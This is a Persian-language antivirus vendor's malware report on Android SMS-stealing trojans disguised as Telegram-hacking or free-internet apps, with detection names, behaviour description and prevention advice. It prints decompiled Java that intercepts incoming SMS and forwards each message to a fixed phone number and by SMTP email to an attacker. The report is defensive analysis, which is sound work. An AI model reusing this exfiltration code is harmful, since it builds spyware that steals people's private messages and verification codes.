Trojan.Android.SmsSpy.ApkeditorsIrhack

شرح کلی

نوع: تروجان (Trojan)
درجه تخریب: متوسط
میزان شیوع: متوسط

اسامی بدافزار

• Padvish) Trojan.Android.SmsSpy.ApkeditorsIrhack)
• Padvish) Trojan.Android.SmsSend.ApkeditorsIrhack)
• Kaspersky) HEUR:Trojan-SMS.AndroidOS.Agent.abr)
• BitDefenderFalx) Android.Trojan.SMSSend.AQT)
• ESET-NOD32) A Variant Of Android/TrojanSMS.Agent.BZW)
• DrWeb) Android.SmsSend.28203)
• Avira) ANDROID/TrojanSMS.IBAV.Gen)

تروجان(Trojan) چیست؟

تروجان‌ها نوعی از بدافزار محسوب می‌شوند که خود را در قالب یک نرم‌افزار سالم و قانونی نشان می‌دهند و بسیار شبیه نرم‌افزارهای مفید و کاربردی رفتار می‌کنند. اما هنگامی ‌که اجرا می‌شوند، خرابی‌های زیادی را برای سیستم ایجاد می‌کنند. نرم‌افزارهای دانلود شده از اینترنت، جاسازی شدن در متن HTML، ضمیمه شدن به یک ایمیل و … از جمله راه‌های ورود تروجان‌ها به سیستم هستند. تروجان‌ها برخلاف ویروس‌ها و کرم‌های کامپیوتری قادر به تکثیر خود نیستند.

خانواده بدافزاری SmsSend/SmsSpy چیست؟

تعداد زیادی اپلیکیشن ایرانی آلوده با نام خانواده بدافزاری سارق پیامک یا ارسال پیامک، در مارکت‌های مختلف اندرویدی، سایت‌های غیر معتبر، کانال‌های تلگرامی و یا لینک‌های آلوده ارسالی از طریق اس ام اس وجود دارند. دسته‌ای از آنها با هدف دستیابی به پیامک‌های دریافتی کاربر و ارسال آنها به شماره‌ای مشخص و ایمیل مهاجم می‌باشند که همگی با نام پکیج “COM.APKEDITORS.IRHACK.APPS” شناخته می‌شوند.

دسته ای دیگر نیز با هدف ارسال پیامک به شماره مشخص شده توسط مهاجم به محض اجرای برنامه می‌باشند. نام پکیج آنها “AMOOGRAM.VAHID.MAIL” است. این برنامه‌ها با نام‌های مختلفی مانند هک تلگرام، ریکاوری رمز اینستاگرام، هک وای فای رایگان، عضو گیر گروه و کانال، شارژ گوشی رایگان، اینترت رایگان، اتصال سرور، مایکت و … به کاربر عرضه می‌شوند.

توضیحات فنی

  • در مورد دسته بدافزارهای آلوده (سارق پیامک) با نام پکیج APKEDITORS.IRHACK.APPS:

برنامه آلوده مورد بررسی با نام “Telegram Hacker” می‌باشد. برنامه بلافاصله بعد از اجرا، ابتدا پیغامی به کاربر نشان می‌دهد مبنی بر “در حال اجرا” بودن برنامه، که پس از پر شدن Progress bar، از برنامه خارج شده و سه پیغام زیر به ترتیب به کاربر نمایش داده می‌شود:

1.”This app does not match your device, your Android is not compatible”

2. “برنامه حذف شد”

3. “@irhack_apps”

بلافاصله پس از نمایش پیغام‌ها به کاربر، از برنامه خارج شده و آیکون برنامه Hidden می‌شود ولی در پس زمینه در حال انجام عملیات مخرب می‌باشد.

IncomingSms

زمانی که پیغام دریافت پیامک از طریق اندروید ارسال می‌شود، برنامه با توجه به مجوز دسترسی “android.permission.RECEIVE_SMS” که در زمان نصب برنامه از کاربر دریافت کرده، می‌تواند به پیامک‌های دریافتی کاربر دسترسی داشته باشد. مشخصاتی چون (شماره تماس ارسال کننده پیام و متن پیام) را از پیامک‌های دریافتی واکشی می‌کند و آنها را در قالب یک رشته به شماره تماس مشخص شده با استفاده از مجوز دسترسی “android.permission.SEND_SMS” ارسال می‌کند.

paramContext = (Object[])paramContext.get("pdus");

        int i = 0;

        for (;;)

        {

          if (i >= paramContext.length) {

            return;

          }

          paramIntent = SmsMessage.createFromPdu((byte[])paramContext[i]);

          this.phoneNumber = paramIntent.getDisplayOriginatingAddress();

          this.messagex = paramIntent.getDisplayMessageBody();

          Log.i("SmsReceiver", new StringBuffer().append(new StringBuffer().append("senderNum:").append(this.phoneNumber).toString()).append("; message: ").toString()+this.messagex);

          try

          {

SmsManager.getDefault().sendTextMessage("09123456789", (String)null, new StringBuffer().append(this.phoneNumber).append(":/n/n").toString() + this.messagex, (PendingIntent)null, (PendingIntent)null);

همچنین، مهاجم با هدف ارسال این اطلاعات به ایمیل خود از پروتکل SMTP استفاده می‌کند. ابتدا وضعیت اینترنت گوشی کاربر را بررسی می‌کند و در نهایت داده‌های جمع آوری شده از پیامک‌های کاربر را به آدرس خود ایمیل می‌کند.

paramIntent.put("mail.smtp.host", "smtp.gmail.com");

            paramIntent.put("mail.smtp.socketFactory.port", "465");

            paramIntent.put("mail.smtp.socketFactory.class", "javax.net.ssl.SSLSocketFactory");

            paramIntent.put("mail.smtp.auth", "true");

            paramIntent.put("mail.smtp.port", "465");

            this.session = Session.getDefaultInstance(paramIntent, new Authenticator()

            {

              protected PasswordAuthentication getPasswordAuthentication()

              {

                return new PasswordAuthentication("Sender@gmail.com", "Password");

              }

            });

            new RetriveFeedTask().execute(new String[0]);

            i += 1;

          }

    @Override

    protected String doInBackground(String... paramVarArgs)

    {

      try

      {

        paramVarArgs = new MimeMessage(IncomingSms.this.session);

        paramVarArgs.setFrom(new InternetAddress("rec@gmail.com"));

        paramVarArgs.setRecipients(Message.RecipientType.TO, InternetAddress.parse("Rec@gmail.com"));

        paramVarArgs.setSubject(IncomingSms.this.phoneNumber);

        paramVarArgs.setContent(IncomingSms.this.messagex, "text/html; Charset=utf-8");

        Transport.send(paramVarArgs);

  • در مورد دسته بدافزارهای آلوده (ارسال پیامک) با نام پکیج AMOOGRAM.VAHID.MAIL:

هدف این گروه از بدافزارها، ارسال پیامک با متن “هک شد” به شماره تلفن مشخص شده توسط مهاجم می‌باشد. نام یکی از این برنامه‌ها “اینترنت رایگان” می‌باشد.

روش مقابله و پاک‌سازی سیستم

برای اطمینان خاطر از عدم آلودگی دستگاه، فایل پایگاه داده آنتی‌ویروس پادویش را نصب و به‌روز نگه دارید و اسکن آنتی ویروس را انجام دهید.

روش های پیشگیری از آلوده شدن گوشی:

1. از دانلود و نصب برنامه از منابع و مارکت‌های موبایلی نامعتبر خودداری کنید.

2. هنگام نصب برنامه‌های موبایلی، به مجوزهای درخواستی دقت کنید.

3. از فایل‌ها و اطلاعات ذخیره شده در گوشی، پشتیبان‌گیری مداوم انجام دهید.

4. از نسخه‌های غیررسمی برنامه‌ها استفاده نکنید. برنامه‌هایی مانند تلگرام و اینستاگرام نسخه‌های غیررسمی زیادی دارند و بیشتر آنها از طریق کانال‌های تلگرامی انتشار می‌یابند.